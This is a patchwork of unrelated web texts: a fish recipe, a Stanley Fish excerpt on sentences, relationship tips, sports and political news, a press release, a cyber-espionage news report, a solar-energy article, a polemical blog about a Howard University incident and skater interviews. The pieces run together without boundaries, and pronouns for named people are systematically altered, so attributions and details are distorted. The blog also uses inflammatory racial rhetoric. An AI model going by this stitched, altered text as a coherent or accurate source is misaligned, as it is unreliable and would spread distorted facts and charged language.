3. Mix the mustard paste, the remaining turmeric powder, red chilli powder, salt and one tablespoon of mustard oil. Coat the fish in the spice paste.
4. Lay two bottle gourd leaves by overlapping the board ends, with the shiny sides down. Place one paste-covered fish steak on the overlapped portion of the leaves. Put a green chilli on top of the fish.
5. Wrap the leaves around the fish and turn the parcel so that the ends are tucked in. There is no need to tie it up as the tender leaves stay folded in.
6. Heat one tablespoon of mustard oil in a heavy-bottomed pan and temper with nigella seeds.
7. Reduce the flame and carefully place the parcels (folded ends down) in a single row in the pan. Carefully turn the parcels after five minutes.
8. Cover and cook for 7-10 minutes over low flame. Remove from fire and serve with steaming hot rice.
Note: to make the mustard paste, soak one tablespoon each of black and yellow mustard in water for 30 minutes. Strain and grind into a fine paste with a green chilli and a quarter tablespoon of salt.
Tanushree Bhowmik is a development professional based in New Delhi, with keen interest in documenting and reviving old recipes, ingredients and eating customs. They write on Forktales.in, which is about food that tells stories.
Comments are welcome at feedback@livemint.com
Excerpt: 'How To Write A Sentence'
How To Write A Sentence: And How To Read One
By Stanley Fish
Hardcover, 176 pages
Harper
List price: $19.99
Why Sentences ?
In their book The Writing Life (1989), Annie Dillard tells the story of a fellow writer who was asked by a student, "Do you think I could be a writer?" " 'Well,' the writer said, 'do you like sentences?' " The student is surprised by the question, but Dillard knows exactly what was meant. They were being told, they explain, that "if they liked sentences they could begin," and they remember a similar conversation with a painter friend. "I asked them how they came to be a painter. They said, 'I like the smell of paint.' " The point, made implicitly (Dillard does not belabor it), is that you don't begin with a grand conception, either of the great American novel or a masterpiece that will hang in the Louvre. You begin with a feel for the nitty-gritty material of the medium, paint in one case, sentences in the other.
But wouldn't the equivalent of paint be words rather than sentences? Actually, no, because while you can brush or even drip paint on a canvas and make something interesting happen, just piling up words, one after the other, won't do much of anything until something else has been added. That something is named quite precisely by Anthony Burgess in this sentence from their novel Enderby Outside (1968):
And the words slide into the slots ordained by syntax, and glitter as with atmospheric dust with those impurities which we call meaning.
Before the words slide into their slots, they are just discrete items, pointing everywhere and nowhere. Once the words are nestled in the places "ordained" for them — "ordained" is a wonderful word that points to the inexorable logic of syntactic structures — they are tied by ligatures of relationships to one another. They are subjects or objects or actions or descriptives or indications of manner, and as such they combine into a statement about the world, that is, into a meaning that one can contemplate, admire, reject, or refine. Virginia Tufte, whose book Artful Sentences (2006) begins with this sentence of Burgess's, comments: "It is syntax that gives the words the power to relate to each other in a sequence ... to carry meaning — of whatever kind — as well as glow individually in just the right place." Flaubert's famous search for the "mot juste" was not a search for words that glow alone, but for words so precisely placed that in combination with other words, also precisely placed, they carve out a shape in space and time. Here is Dillard again: "When you write you lay out a line of words. The line of words is a miner's pick, a woodcarver's gouge, a surgeon's probe. You wield it and it digs a path you follow." And when you come to the end of the path, you have a sentence. Flaubert described themselves in a letter as being in a semi-diseased state, "itching with sentences." They just had to get them out. They would declaim them to passersby.
I wish I had been one of them. Some people are bird watchers, others are celebrity watchers; still others are flora and fauna watchers. I belong to the tribe of sentence watchers. Some appreciate fine art; others appreciate fine wines. I appreciate fine sentences. I am always on the lookout for sentences that take your breath away, for sentences that make you say, "Isn't that something?" or "What a sentence!" Some of my fellow sentence appreciators have websites: Best Sentences Ever, Sentences We Love, Best First Sentences, Best Last Sentences. Invariably the sentences that turn up on these sites are not chosen for the substantive political or social or philosophical points they make. They are chosen because they are performances of a certain skill at the highest level. The closest analogy, I think, is to sports highlights; you know, the five greatest dunks, or the ten greatest catches, or the fifteen greatest touchdown runbacks. The response is always, "Wasn't that amazing?" or "Can you believe it?" or "I can't for the life of me see how they did that," or "What an incredible move!" or "That's not humanly possible." And always the admiration is a rueful recognition that you couldn't do it yourself even though you also have two hands and feet. It is the same with sentences that do things the language you use every day would not have seemed capable of doing. We marvel at them; we read them aloud to our friends and spouses, even, occasionally, to passersby; we analyze them; we lament our inability to match them.
One nice thing about sentences that display a skill you can only envy is that they can be found anywhere, even when you're not looking for them. I was driving home listening to NPR and heard a commentator recount a story about the legendary actor Joan Crawford. It seems that they never left the house without being dressed as if they were going to a premiere or a dinner at Sardi's. An interviewer asked them why. They replied, "If you want to see the girl next door, go next door." It is hardly surprising that Joan Crawford had thought about the importance to fans of movie stars behaving like movie stars (since their time, there has been a sea change; now, courtesy of paparazzi, we see movie stars picking up their laundry in Greenwich Village or Brentwood); what may be surprising is that they could convey their insight in a sentence one could savor. It is the bang-bang swiftness of the short imperative clause — "go next door" — that does the work by taking the commonplace phrase "the girl next door" literally and reminding us that "next door" is a real place where one should not expect to find glamour (unless of course one is watching Judy Garland singing "The Boy Next Door" in Meet Me in St. Louis).
A good sentence can turn up in the middle of a movie where it shines for an instant and then recedes as the plot advances. At one point in The Magnificent Seven (1960), the bandit leader, played by Eli Wallach, explains why they aren't bothered much by the hardships suffered by the peasant-farmers whose food and supplies they plunder:
If God didn't want them sheared, they would not have made them sheep.
The sentence is snapped off, almost like the flick of a whip; it has the form of proverbial wisdom (a form we shall look at later), and the air of finality and certainty it aspires to is clinched by the parallelism of clauses that also feature the patterned repetition of consonants and vowels: "didn't want" and "would not have," "sheared" and "sheep." We know that "sheep" is coming because of "sheared" and when it arrives it seems inevitable and, at least from one perspective, just. Not bad for a bandit. Even children can produce a good sentence. My mother-in-law, Lucille Reilly Parry, was a grade-school teacher and they recalled a day when a large box was delivered to the school. No one knew where it had come from or what it was, and they gave their fourth-grade students the assignment of writing something about it. One student began their essay with this sentence:
I was already on the second floor when I heard about the box.
What is noteworthy about this sentence is its ability to draw readers in and make them want more. It is a question of what we know and don't know. We know that the writer was in the middle of something ("I was already") but we don't know what; neither do we know how they learned about the box or what effect (if any) the fact of it had on what they were in the course of doing. And so we read on in the expectation of finding out. Many practiced writers would kill for a first sentence that good.
I found another of my favorite sentences while teaching the last big school-prayer case, Lee v. Weisman (1992). Mr. Weisman brought a cause of action against Nathan Bishop Middle School in Providence, Rhode Island (the same school I attended many decades ago), because a thoroughly secular prayer had been read at their daughter's graduation. Weisman regarded the prayer as a breach of the First Amendment's prohibition against the state's establishing of a religion. A majority of the Supreme Court justices agreed with them and reasoned that even though the prayer had no sectarian content and made no demands on the students, who were free to ignore it, its very rehearsal was an act of "psychological coercion." This was too much for Justice Scalia, who, after citing a fellow jurist's complaint that establishment clause jurisprudence was becoming so byzantine that it was in danger of becoming a form of interior decorating, got off this zinger:
Interior decorating is a rock-hard science compared to psychology practiced by amateurs.
The sentence is itself a rock thrown at Scalia's fellow justices in the majority; it is a projectile that picks up speed with every word; the acceleration is an effect of the two past participles "compared" and "practiced"; their economy does not allow a pause or a taking of a breath, and the sentence hurtles toward what is both its semantic and real-life destination: the "amateurs" who are sitting next to Scalia as they spit it out.
The pleasure I take in the sentence has nothing to do with the case or with the merits of either the majority's or the dissent's arguments. It is the pleasure of appreciating a technical achievement — here the athletic analogy might be to target shooting — in this case, Scalia's ability to load, aim, and get off a shot before their victims knew what was happening. I carry that sentence around with me as others might carry a precious gem or a fine Swiss watch. I pull it out and look at it. I pull it out and invite others (who are sometimes reluctant) to look at it. I put it under a microscope and examine its innermost workings.
Excerpted from How To Write A Sentence by Stanley Fish. Copyright 2011 by Stanley Fish. Reprinted courtesy of Harper, an imprint of HarperCollins Publishers.
I can still remember myself, several years ago, chatting with some friends and telling them loud and clear: “Me? I would never go for a long-distance relationship!”
I had to change my opinion when I met my boyfriend, a little bit over two years ago. We met during our Erasmus year, in Sweden. He's Spanish, I'm French, and we have lived apart for one year.
How did we make it work?
We knew the distance was temporary – make a plan!
Our plan was to move together a year later, when we will be done with our Bachelors. This plan got us through the hardest days, and helped us keep it together. Just like you know your degree is 3 years, our distance relationship was 1 year. This is the first, and most important piece of advice I would give.
We never said goodbye without knowing when we would see each other again – schedule, schedule, schedule!
This was a hard rule to keep, because finding the right flights was not always easy: it was time-consuming and always ruined our day. Finding matching dates, the right journey with acceptable layovers, not crazy-expensive price… It was a hassle. Having very few days together, it was sometimes hard to be like “Ok, let's make today a terrible day and take care of the tickets”. But we always did. This way, it kept it real, and we always knew what to expect. We wouldn't have made it without knowing this.
Always make time for each other – but make sure to leave space for your “local” life too!
A long-distance relationship has another complicated aspect, and it is how you handle it with your relatives. Friends, family sometimes offer you to go out for a drink, come over for dinner, or go to a movie. But this day is the day you Skype with bae… The balance is hard to maintain. Whenever I was at a party or with some friends, I always made sure I would call them to wish them a goodnight. And we never canceled our virtual movie sessions. BUT, we both made sure to always make space for our friends, and never got mad at each other for going out late or postponing a Skype session.
Small attentions are the key – don't see big, see with love!
A short surprise call (“Hey, I just wanted to hear your voice!”), an unexpected SMS, a letter by traditional mail, an Amazon surprise delivery (doesn't need to cost you an arm nor 3 hours of search), a small gift whenever you meet each other (we would always pick up each other with some nice treats and a bottle of water after such long journeys), a handwritten letter hidden in the suitcase – to be found after departure, etc. It's all about nice touches.
Virtual dates may sound odd – but they are romantic, somehow!
I loved our movie sessions. We picked a movie, got in bed with some popcorn, with the phone/Skype on and counted to start at the same time…“1, 2, 3, play!”. Some people also do it for dinners, we haven't tried, but I'm sure it works too!
Have you been – or are you – in a long-distance relationship? What are your tips to make it work?
Cover photo: ©Pixabay – pixabay.com
Advertisements
Packers Blog The Journal Sentinel's team of Packers beat writers provide the latest news, notes and analysis SHARE
By of the
Green Bay --- All along, rookie lineman JC Tretter believed he'd have a chance at playing this season. They never doubted that much.
“I knew that if there was just a 0.01% chance to return this year," Tretter said Wednesday, "I would take advantage of that 0.01% chance. If anyone was going to be able to do it, I knew I was going to be the one to do it."
Three regular-season games to go, the fourth-rounder Tretter is now in position to help the Packers if they need him. On Tuesday, after practicing three weeks, Tretter was lifted to the 53-man roster. They had been on the physically unable to perform list since suffering a broken fibula and torn ligaments in their ankle the first day of organized team activities. Working at both center and guard, Tretter may be an injury away from playing on Green Bay's offensive line. As written last week, the Packers have eyed Tretter as a center.
The starter, Evan Dietrich-Smith, has been battling through injuries. Most recently, Dietrich-Smith gritted through an ankle injury suffered in practice.
A tackle at Cornell, the 6-foot-3 1/2, 296-pound Tretter said most teams projected them as either a center or guard.
The last several months, he's been trying to pick up a mentally taxing position via the iPad.
“A lot of studying, a lot of studying," Tretter said. "Obviously, it's not the same thing when you're out there. You can see a little “T” drawn over the top of you but it's not the same as having a 330-pounder over top of you. So it's different that way. But you have to be able to know what you're going to do. Now you're out there. Now you can start translating everything you thought through reading the iPads into actually doing it and seeing everything move."
In Green Bay's offense, Tretter said, "a lot" is put on the center.
At tackle, they communicated with the adjacent guard. That's it. At center, he's making multiple declarations, calls and, in general, speaking up a lot more.
The Cornell education may be one reason the Packers projected them as a center, Tretter acknowledged.
"Going to the Ivy League, getting an Ivy League education definitely helps," Tretter said. "They understand that you can get your nose in a playbook, your nose in an iPad and learn. And that's important.”
On Wednesday, Tretter said they worked at center and guard for the scout team. Coach Mike McCarthy made it clear after practice that Tretter isn't on the roster for the future. They were activated off P.U.P. list to help now.
Said McCarthy, "He looks good. Everybody was impressed with the progress he's made over the three weeks. He's practicing, getting ready like everybody else."
When and in what capacity, for now, is unknown. But Tretter is ready.
"Doing whatever the team needs me to do," Tretter said. "If that's getting out there and playing a position, whatever position that is or if that's just giving a hell of a look on scout team. That's what I'm going to do, whatever they ask me.”
Alan Eggleston (born 30 December 1941) is an Australian politician, who was a Liberal member of the Australian Senate from 1996 to 2014 representing Western Australia.
Career [ edit ]
Early career [ edit ]
They were born in Busselton, Western Australia, and was educated at the University of Western Australia, where they studied medicine, and at Murdoch University, where they graduated in arts.
Professional career [ edit ]
They were a medical practitioner in Port Hedland, Western Australia serving from 1974 until 1996. They were a councillor in Port Hedland serving from 1988 until 1996 and mayor serving from 1993 until 1996. They were a member of the Pilbara Development Commission from 1994 until 1996.
Personal life [ edit ]
They have achondroplasia, a common cause of dwarfism.[1] They retired from all of their other political jobs to be a senator. On 9 April 2012, Eggleston announced that they would not be recontesting the Next Australian federal election in 2013 and retire at the end of their term in 2014.[2]
References [ edit ]
Feeling pain at the pump? Gas prices have doubled since Mr. Obama took office. According to the GasBuddy gasoline price tracking web site, the price of a gallon of regular gas was around $1.79 when Mr. Obama took office. Today the national average is $3.58. The lowest average price in the continental United States is $3.31 in Tulsa Oklahoma, the highest is $4.14 in Santa Barbara, CA. Four-dollar-a-gallon gas has arrived on average throughout California, and a number of other states are headed in that direction.
SEE RELATED:
Consumer price index (CPI) figures from February show an unadjusted 12 month gasoline inflation rate of 19.2%, but in the last month alone prices jumped 6.8%, probably because of oil price increases due to instabilities in the Middle East. If the trend continues, gas prices would double again within a year. 100% gasoline price inflation is nothing to brag about, but imagine Mr. Obama going into the 2012 election having to explain why gas costs $7.00 a gallon. I'm sure the White House would spin it as one of their “Green” initiatives.
"You will, therefore, be taken to the Dune Sea and cast into the Pit of Carkoon, the nesting place of the all-powerful sarlacc." ―C-3PO, translating Jabba the Hutt [src]
The Great Pit of Carkoon was a large sand basin located within the Dune Sea, on the desert planet of Tatooine.[2] Inside the pit was a creature known as a sarlacc, which could swallow an individual whole and slowly digest them over one thousand years. Due to its proximity to Jabba the Hutt's palace, the crime lord used the pit and its sarlacc for torturous executions. The pit was the location of the rescue of Han Solo, which took place shortly before the Battle of Endor.[1]
Contents show]
Behind the scenes Edit
The sound of the sarlacc was created from sounds of alligator hisses, as well as the sounds of some of the Jedi crew's stomachs after eating pizza.[3]
This article is a stub about a natural formation or a body of water. You can help Wookieepedia by expanding it.
Appearances Edit
Non-canon appearances Edit
Sources Edit
Notes and references Edit
A large group of migrants fought with locals in the German town of Peine, Lower Saxony, throwing stones, damaging cars, and shouting “Allahu Akbar”.
The clash began at around 9 p.m. Wednesday when a group of 10 migrants, some Syrian and some Palestinian, got into a fight. Shortly after the violence began, the police arrived on the scene and most of the perpetrators fled leaving one individual with a head injury who was taken to a nearby hospital.
At around 11 p.m., however, the violence erupted in the area once more when the migrants returned and began to smash the cars of local residents, many of whom are of a foreign background themselves. Around 40 to 50 locals left their houses to confront the mob, who threw rocks at the residents, as cries of “Allahu Akbar” were heard, Hannoversche Allgemeine Zeitung reports.
Police say the majority of the residents involved had Lebanese, Turkish, or Kurdish origins.
During the chaos, a police car was also hit by rocks thrown by one of the rioters. Police managed to eventually separate the two groups after a large deployment of officers arrived on the scene called in from other departments.
Police say that only one man was arrested for resisting officers' commands, and authorities have launched an investigation into several cases of bodily harm and property damage.
The case is similar to what happened in the town of Bautzen last year when migrants rampaged through the city only to be confronted by locals. The fight involved around 20 migrants and 80 right wing supporters who shouted slogans at the migrants.
Another fight broke out in Bautzen later in December at a Christmas market, once again between locals and asylum seekers. Police said the two groups came to blows after a heated argument. After they were finished fighting, the migrants caused hundreds of euros of damage to a car.
Mass brawls between migrants have occurred in asylum homes as well, some of which have also been caught on film. One such brawl in Dortmund saw over a dozen migrants attack each other with chairs and other weapons leading to the hospitalisation of several people.
Follow Chris Tomlinson on Twitter at @TomlinsonCJ or email at ctomlinson@breitbart.com
Show full PR text
Amid the raft of new car concepts at the Frankfurt Motor Show this month, one of the head-turners was Volkswagen's bright orange ray of sunshine, the buggy up! concept.The buggy up! is inspired by the Californian beach buggies of the 1960s. These buggies, pioneered by people such as American Bruce Meyers, took the simple, reliable Beetle chassis and engine and replaced the steel bodies with glassfibre, creating agile, fun vehicles that perfectly reflected the care-free California in which they were created.That same California feeling is encapsulated in the lightweight steel construction of the two-seater buggy up!, which brings the beach buggy bang up to date. Based on the brand-new up!, the buggy up! keeps its city sibling's (reinforced) underbody, running gear and drive technology, while the roof-less and door-less exterior is completely redesigned, and the ride height is lowered by 20 mm. Everything is different: the bonnet is flatter, the bumpers have been reworked and the rear has been completely redesigned.The buggy up! does not have any C-pillars, and neither does it have a boot like the standard up! model. The bootlid is constructed of two pieces: the main part of the lid lifts upward like a saloon's bootlid, but the section above the bumper folds down, like the tailgate on a pick-up, making it extremely easy to stow bulky items. On top of the lid, there are also tie-down straps for luggage. Despite all these changes, there's no mistaking the buggy up! for anything but an up!.Climb into the buggy up! and you'll find specially designed neoprene-covered seats that are 58 mm lower than those in the production model. To match this, engineers reduced the basic angle of the height-adjustable steering wheel by four degrees to an angle of 21 degrees, creating a go-kart like driving position. Passengers also get something to hold on to, in the shape of a sturdy handle on the dash panel, because you never know what lies over the next dune.Even if there are rainclouds over the next dune, that's no problem for the buggy up!, because as well as a rudimentary fabric roof, the interior is completely waterproof. The seats have drains in them, as do the sills and the floor. Even the controls for the iPod-compatible infotainment system are waterproof, and you can remove the entire module – including the integrated loudspeakers – so that you've got a sound system for your beach party. All you need to add is your favourite Beach Boys tracks.
Rep. Mike Rogers, R-Mich., questions executives of two major Chinese technology companies Sept. 13. (Photo11: J. Scott Applewhite, AP) Story Highlights Research and advocacy groups have big influence on government policy
'Furious wave of cyber-espionage,' says key House member
Other nations seek data on policy discussions, pending litigation
American think tanks are key targets in a "furious wave of cyber-espionage" aimed at U.S. government and business by China and other countries, according to the chairperson of the House Intelligence Committee.
Rep. Mike Rogers, R-Mich., told USA TODAY that the hacking is part of a campaign by China and other nations to obtain valuable information on a number of fronts, from policy deliberations and pending litigation to national defense and private product development.
Think tanks provide important research, strategy and support on policy formulation for U.S. leaders in the White House, Pentagon, Congress, State Department and federal agencies. Their ranks of scholars are populated by former and potentially future government officials.
Shawn Henry, the FBI's former top cybersecurity official, said overall cyberattack complaints reported to U.S. authorities were increasing by 20% annually. They said that think tanks, consulting organizations and law firms -- all of which play roles in shaping U.S. policy and strategy -- have long been prized targets of foreign espionage operations.
"These organizations aggregate very valuable data, and that's exactly the kind of information that foreign intelligence services are looking for," said Henry, who left the FBI this year. "Over the past two years, attacks have increased at a substantial rate."
Said Rogers: "The scope of this is breathtaking."
James Andrew Lewis, a senior fellow and director of technology and public policy at the Center for Strategic and International Studies, said that during the transition to the Obama administration in 2008 and 2009 some people moving from think tanks and the private sector into the administration had their e-mail accounts hacked. They said the hackers were looking for information to help build profiles on those who were about to serve in the government.
"If you know a person is going into DoD (Department of Defense) and they are right now working on a crummy unclassified system, that is a great target," Lewis said.
They said their organization, a non-partisan think tank on international affairs, recently had password troubles that they blamed on hackers. "This is fairly routine; it goes through waves," they said.
Lewis said hackers often are "looking for disruption, just making it hard for the place to do business."
They said many of the intrusions are traced to China, either government or "proxies" such as "patriotic hackers" urged on by the government.
Repeated attempts to contact the Chinese Embassy for a response were unsuccessful. After The Wall Street Journal published a story about suspected Chinese hacking of the U.S. Chamber of Commerce last December, Chinese Embassy spokesperson Geng Shuang said their country was also a "major victim of hacker attacks" from abroad.
"The Chinese government would like to work with other countries, including the U.S., to explore effective ways to combat cyberattack and protect cybersecurity based on the principle of equality in accordance with Chinese law," Shuang said in a statement then.
The FBI declined comment.
Mike Gonzalez, spokesperson for the conservative Heritage Foundation, said their organization had determined that an attack it fended off most likely came from China. They would not say when it happened except that "it was not 10 years ago."
"We dealt with it when we had it, quickly and efficiently," Gonzalez said. Think tanks sometimes consult with each other on such threats, they said.
The Center for American Progress is populated with scholars with ties to the Obama and Clinton administrations and to Democrats on Capitol Hill.
"While we don't comment on any specific incidents, we are continually vigilant about our security and are regularly targeted in cyberattacks that originate both inside and outside the U.S.," said Andrea Purse, the think tank's vice president of communications.
Henry, the ex-FBI cyberofficial who is now a private consultant, said that "vulnerabilities across the network are significant.
"Most major organizations have been infiltrated. The value of data is such that it just makes sense for our adversaries to get involved. There are dozens of countries involved, not just China."
They said the federal government has been working "very hard to combat the problem" but that "the breadth and depth of this is so large that the government doesn't have the capacity" to fully confront the threat.
Follow Chuck Raasch on Twitter @craasch
Read or Share this story: http://usat.ly/SAqjK2
Frameworks needed for secure data collaboration
Nick Halstead Blocked Unblock Follow Jun 23, 2017
GDPR should be seen as a “call for changing how we view data” rather than a regulation, was one of the key assertions of the Data Privacy, Data Ethics and GDPR panel at CogX17 London.
Few companies actually know what happens to customer data when they share or sell it to third parties. They have no control over where the data goes after it leaves the organisation and where it could be moved onto next.
However, under GDPR, if a customer withdraws consent, it will be the responsibility of the company to ensure all third parties also stop processing this data. To the extent that the original company will be hit with the same non-compliance fine (up to €20 million or 4% of annual global turnover, whichever is higher).
A topical example is the controversial partnership between Google's DeepMind and Royal Free London NHS Foundation — all for not gaining explicit consent to share health records. Although the possibilities for advancing medical research are vastly increased by being able to share medical data, this data is very sensitive and it is vital that best practices are being used.
To tackle this, as I said during the panel, we need new frameworks for secure data collaboration.
I'm a big believer in aggregated data, as it enables companies to analyse and segment customers without needing to be focused on the individual, therefore keeping privacy intact.
The decentralisation of models is set to completely disrupt how data is handled and will be a game-changer for increasing data privacy.
In addition, the panel's chair, Ian West, posed the question of whether GDPR would stifle innovation and the consensus was no. I believe that whilst GDPR will bring short-term pain, it will also bring long-term competitive advantage.
The legislative changes will build trust between customers and businesses, which will result in closer relationships and increased loyalty. In addition, GDPR has spurned a whole host of innovative startups in Europe looking to help companies tackle this very problem — who are now ahead of companies in the US and Asia.
Lastly, the world of AI needs more data to train models and grow — but we need to ensure robust frameworks are being used as more and more data is implemented. I firmly believe that the best practice for obtaining and analysing higher quality datasets is through decentralised and aggregated data models.
Enjoy reading this? Join my weekly data digest. 💌
Welcome to Ars UNITE, our week-long virtual conference on the ways that innovation brings unusual pairings together. Today, we examine the evolution of solar and how business—not tech—may be holding it back. Join us this afternoon at 1pm Eastern (10am Pacific) for a live discussion on the topic with article author John Timmer and their expert guest; your comments and questions are welcome.
In the US, the future of solar energy will be made in California. Earlier this month, the state's governor signed legislation that commits California to obtaining half of its electricity from renewable sources by 2030. And to some extent, that future is now—the state's utilities are working to meet a goal of one-third renewables by 2020.
In a lot of ways, this should be easy for California. The price of solar power has plunged—for utility scale solar, it can be cheaper to build and operate a plant (given existing incentives) than it is to simply supply fuel to a natural gas plant. Plus, countries like Spain and Germany (which also has a goal of 50 percent by 2030) have already done extensive solar rollouts and can provide valuable lessons.
Further Reading Utility-scale solar costs down by half in last five years alone
And on top of that, California is nearly ideal solar territory. Extensive deserts and scrubland see mostly cloudless days and little of the dust that plagues deserts in other parts of the world. These regions are generally close to major urban areas and existing transmission infrastructure, and you'd expect that California would have a relatively smooth time ramping up its renewable power.
But there are challenges inherent in the structures we use to handle and pay for electricity. Going half renewable doesn't just strain the grid as a distribution method; it challenges the economic assumptions on which we've built our electric grid. To have a grid where half the power is supplied by intermittent renewable sources, we'll have to completely rethink how we manage the electric grid.
So in many ways, solar power is likely to be a truly disruptive technology. And it's likely to cause some destruction in the process of disruption.
What do we need from solar?
Remarkably little, as it turns out. Most classes of photovoltaic power—thin film, silicon, etc.—are seeing incremental improvements, and that's likely to continue. But we're unlikely to see any radical leaps in these areas. There are also a number of areas in active research, primarily involving concentrating solar power—technologies that focus sunlight on highly efficient (but highly expensive) photovoltaic devices. So far, none of these technologies have gotten to the point where they're close to competitive with traditional tech like silicon.
We talked to two people who focus on solar energy at the Department of Energy: Landis Kannberg of the Pacific Northwest National Lab and Paul Basore, a Principal Engineer at the National Renewable Energy Laboratory. Neither of them knew of any technologies in the works that were likely to reduce the costs of installation or support hardware.
Silicon photovoltaics have gotten so cheap, in fact, that the panels themselves are only a small part of the total expense of installing a system. This is the one thing that could make concentrating solar economically viable. As installation and permitting costs grow to dominate the price of photovoltaics, it starts to become more economical to harvest more energy from each panel—precisely what concentrating solar allows. However, it's not certain that this trend will ever intersect the price trend of concentrating solar.
Plus there's a non-technological solution to the cost of installation: simplifying the permitting process. "You only have to look to Europe to see that it could be a lot better than it is now in the US," Basore told Ars. "In Italy, modules there are less than half the cost. It's gotten to the point where modules are maybe a third of the cost in Europe. In the US, we approach that at utility scale. But anything smaller than utility scale in the US, the modules become an almost negligible part of the total cost."
Other areas where policy could help out is a consistent approach to tax credits. "In the US at least, the changing policies relative to tax credits has a whipsaw effect on demand," Kannberg told Ars. That, in turn, has sent mixed messages to hardware manufacturers. But the market has now grown to the point where the specific policy in place in the US doesn't have as much of an effect on global manufacturing. "The prices are dropping or have dropped to where, at least from an international standpoint, it's a pretty compelling technology now, and I suspect that manufacturing capacity may soon become an issue."
Assuming manufacturing continues to ramp up, supplying California with the hardware it needs shouldn't be a problem. And if the US can get its policy house in order, getting that hardware to homes should be manageable as well.
What does a 50 percent renewable grid look like?
We don't have to imagine what California's 50 percent renewable grid will look like. Since their businesses depend on it, a number of California utilities asked a group of analysts to look into it. The organization they hired modeled a variety of different potential scenarios, including some with a diverse portfolio of renewable sources and some relying heavily on rooftop or utility-scale solar.
The biggest challenge with going to half renewables is overgeneration. The state receives power from a number of sources that simply can't be shut down—combined heat and power systems and nuclear plants, for example. Layered on top of that are renewable sources like solar that generate power whether you want them to or not. This isn't a problem with California's 2020 goals (33 percent renewables) even on sunny days in the spring. But by the time the grid reaches 40 percent renewables, there could be as much as five GigaWatts of overproduction on a sunny afternoon. At half renewables, there's a staggering 20GW of overproduction.
By 5pm, however, the overproduction is gone. As people get home from work and start the largest demand peak of the day, stored electricity and out-of-state imports have to be called into play to meet it.
The analysis found a variety of ways to limit the impact of this overproduction. The simplest is storage. California has targeted adding 1.3GW of storage to its grid within the decade, and it currently has about three Gigawatts of pumped hydro, the most economic form of storage. But given the recent drought, it's not clear whether all of that will be available at any moment. In any case, it's not going to be sufficient to absorb all of the overproduction, even assuming the storage was empty to start the day.
Other options include diversifying the mix of renewables used to reach the 50 percent goal. A scenario that supplemented the photovoltaics with other sources—such as biomass, wind, geothermal, and solar thermal power—cut the overproduction by roughly half. Further efforts to integrate California's grid to those of surrounding states would also allow it to export some of the excess. All of these things would help to varying degrees, although it's still likely that some electricity would have to be discarded.
All of it comes at a cost. The 33 percent renewable grid isn't expected to add significantly to the rates California consumers would pay; they'd go up, but largely from work that would have to be done anyway. By going to 50 percent, however, the report estimates the state's rate payers will be on the hook for an increase of anywhere between nine and 23 percent.
Right here in Annex white people gettin real bold we don't stand w trump pic.twitter.com/zoit7UpC2h
Needless to say, that attiude was shared by many who felt "threatened" by the little girls.
Howard is a private institution and I've seen folks removed for campus for less. What did campus police do? This is unacceptable. https://t.co/eeiHuQbmyw — Jamilah Lemieux (@JamilahLemieux) August 20, 2017
Surely, they were joking about calling the police. Right?
Howard is a private institution and I've seen folks removed for campus for less. What did campus police do? This is unacceptable. https://t.co/eeiHuQbmyw — Jamilah Lemieux (@JamilahLemieux) August 20, 2017
Annex cafe security should have stopped them at the door and forcibly removed them from the premises. Campus security should have — Aphrodite Ina Nighty (@FleurDeLaDay) August 19, 2017
The Howard University cafeteria staff agreed with the snowflakes:
We will take any action necessary to ensure that HU students feel safe& comfortable in our dining spaces. This group is no longer on campus. — HUDining (@HUdining) August 19, 2017
Are the snowflakes self-aware enough to realize what they are advocating? If no white person will be allowed on campus, and if the sight of a white face is going to send these people over the edge, how are they going to survive when they're forced to enter the big, wide world out there where 2/3 of the people they will be dealing with are white?
The answer is "safe spaces" for black people. And those safe spaces, by definition, would have to be all black - meaning, a separate civil entity populated entirely by black people. It's either that or send all whites to the gas chambers. How else are you going to get rid of them?
Yes, there is an element of humor in this hysterical reaction to a Trump supporter. But there are also hints of fascism and authoritarianism that, unless checked, will lead to unthinkable consequences.
We laugh at them at our peril.
1. Do you remember what you did with the first check you earned from skateboarding?
Daewon Song: I got $500 and gave my dad $300 to help out with the house and bought a fancy burrito. I was always eating bean burritos from Taco Bell. I never had money because my parents said, “If you're hungry eat at home!” I still eat Taco Bell.
Jereme Rogers: Splurged.
Billy Marks: I bought a cell phone and opened a bank account, and it was pretty much gone.
Duane Peters: I bought a brand-new stereo and some records, a new drum kit for my drummer, a Peavy 4/12 for my guitar player and took all the Thai Stix crew to Sal Si Puedes in Mexico when it was just an Olive Grove and a cliff for a week.
Mike Mo Capaldi: I actually didn't do anything with my first year of checks. I never bought one thing. The reason I never bought anything was because I didn't have a debit card and I never felt like going to the bank to grab cash. Ever since I got that card it's been nothing but downhill… Not really.
2. What financial advice would you give to a newly sponsored skater who's beginning to make a little money?
Daewon Song: This is a hard one, but first off enjoy yourself and what you're given. Don't take advantage of what these companies are doing for you and what you're able to do for a living. Save when you can, but live a little as well.
Jereme Rogers: Enjoy it, don't save, but that doesn't mean waste it. Don't just save. Always believe there's more and trust that the man upstairs is your supplier. They have bottomless pockets. Penny pinching and saving puts restrictions and limitations on your mind leaving you to believe that you need to be saving. Have faith that you're gonna make more and more every year, which you can most certainly do with a healthy mental attitude and outlook towards money. Have faith and be content where you're at while always craving to conquer more. We were made to be conquerers.
Billy Marks: It depends on the person. I'd say have fun while you can. But I know people like James Hardy that saves every cent.
Duane Peters: Spend it! You only live once!
Mike Mo Capaldi: Just save your money, save for a house!
3. What is the most expensive thing you've bought?
Daewon Song: A house and an English Bulldog after my 14yr old one passed away.
Jereme Rogers: House, and an Aston Martin if we're talking outside of property.
Billy Marks: My house and my car.
Duane Peters: Probably my bones.
Mike Mo Capaldi: Plasma HDTV 42 inch. I think it was like, $1300? Wait actually, I bought a car. Honda accord 08′.
4. Have you made any investments?
Daewon Song: Well I bought a house and I have several other investments in the skateboard industry.
Jereme Rogers: Too many to count. Most recent would be PMP; a production company I started for music. Which is so I can sign artists and producers. We have a great rapper right now named Detroit, an 8mile representative, and a few in house producers. So that shit is definitly an expense.
Billy Marks: No, but I should probably start doing something.
Duane Peters: Everyday is investment for tommorow brother! Hah!
Mike Mo Capaldi: I have some stocks. My dad told me to do it… and that's right before the market crashed. Haha!
5. Biggest waste / regret about money you've spent?
Daewon Song: All the Transformers I bought when I was 13. I had every single one but one day my weakness for sweets at the time got me to trade all of them for a huge box of Redvines and other sugary treats my parents would not dare let me have. Plus they didn't have a membership card to the Priceclub like my friend Andy's parents did. BAD TRADE and money was stolen from my parents which I regret and would never do again know now how hard things are as a parent. They beat me good though! No laws against that when I was a kid. A big thanks to my parents upstairs R.I.P.
Jereme Rogers: I don't possess regret.
